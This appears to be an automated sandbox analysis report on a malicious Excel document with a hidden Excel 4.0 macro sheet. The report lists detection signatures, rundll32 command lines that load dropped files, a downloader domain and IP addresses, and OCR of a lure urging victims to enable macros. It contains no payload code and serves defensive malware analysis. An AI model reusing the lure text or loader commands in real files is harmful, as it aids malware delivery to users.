Loading ...

Play interactive tourEdit tour

Analysis Report 46747509_by_Libranalysis.xls

Overview

General Information

Sample Name:46747509_by_Libranalysis.xls
Analysis ID:412137
MD5:46747509aca01f63274d3edfeddb787b
SHA1:8bcb09a42a62453b9437915442ce981896cb4de7
SHA256:00da3dfab496ea65873d53636db189ed7bd46f502386cb014876a75d71d6869b
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6764 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7064 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7088 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6764, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 7064

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.6:49718 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.6:49716 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.6:49716 -> 192.185.39.58:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.aadrm.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.cortana.ai
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.office.net
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.onedrive.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://augloop.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cdn.entity.
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://clients.config.office.net/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://config.edge.skype.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cortana.ai
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cortana.ai/api
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://cr.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dev.cortana.ai
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://devnull.onenote.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://directory.services.
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://graph.windows.net
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://graph.windows.net/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://lifecycle.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://login.windows.local
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://management.azure.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://management.azure.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://messaging.office.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ncus.contentsync.
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://officeapps.live.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://onedrive.live.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://outlook.office.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://outlook.office365.com/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://settings.outlook.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://staging.cortana.ai
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://tasks.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://wus2.contentsync.
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.6:49718 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enable Content / 14_ from the yellow bar above ' 0 15 16 17 ,, W
Source: Screenshot number: 4Screenshot OCR: Enable Content / 14_ from the yellow bar above ' 0 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMEN
Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click Enable Content / 14_ from the yellow bar above ' 0 15 16 17 ,, W
Source: Screenshot number: 8Screenshot OCR: Enable Content / 14_ from the yellow bar above ' 0 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMEN
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above O Calibri - 18 - A" A" '"""Q 0 WHY I CANNOT OPEN THIS
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 46747509_by_Libranalysis.xlsInitial sample: CALL
Source: 46747509_by_Libranalysis.xlsInitial sample: CALL
Source: 46747509_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 46747509_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 46747509_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal68.expl.evad.winXLS@5/6@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{058803BA-51D4-4A9F-8EDF-0E8F5C196959} - OProcSessId.datJump to behavior
Source: 46747509_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
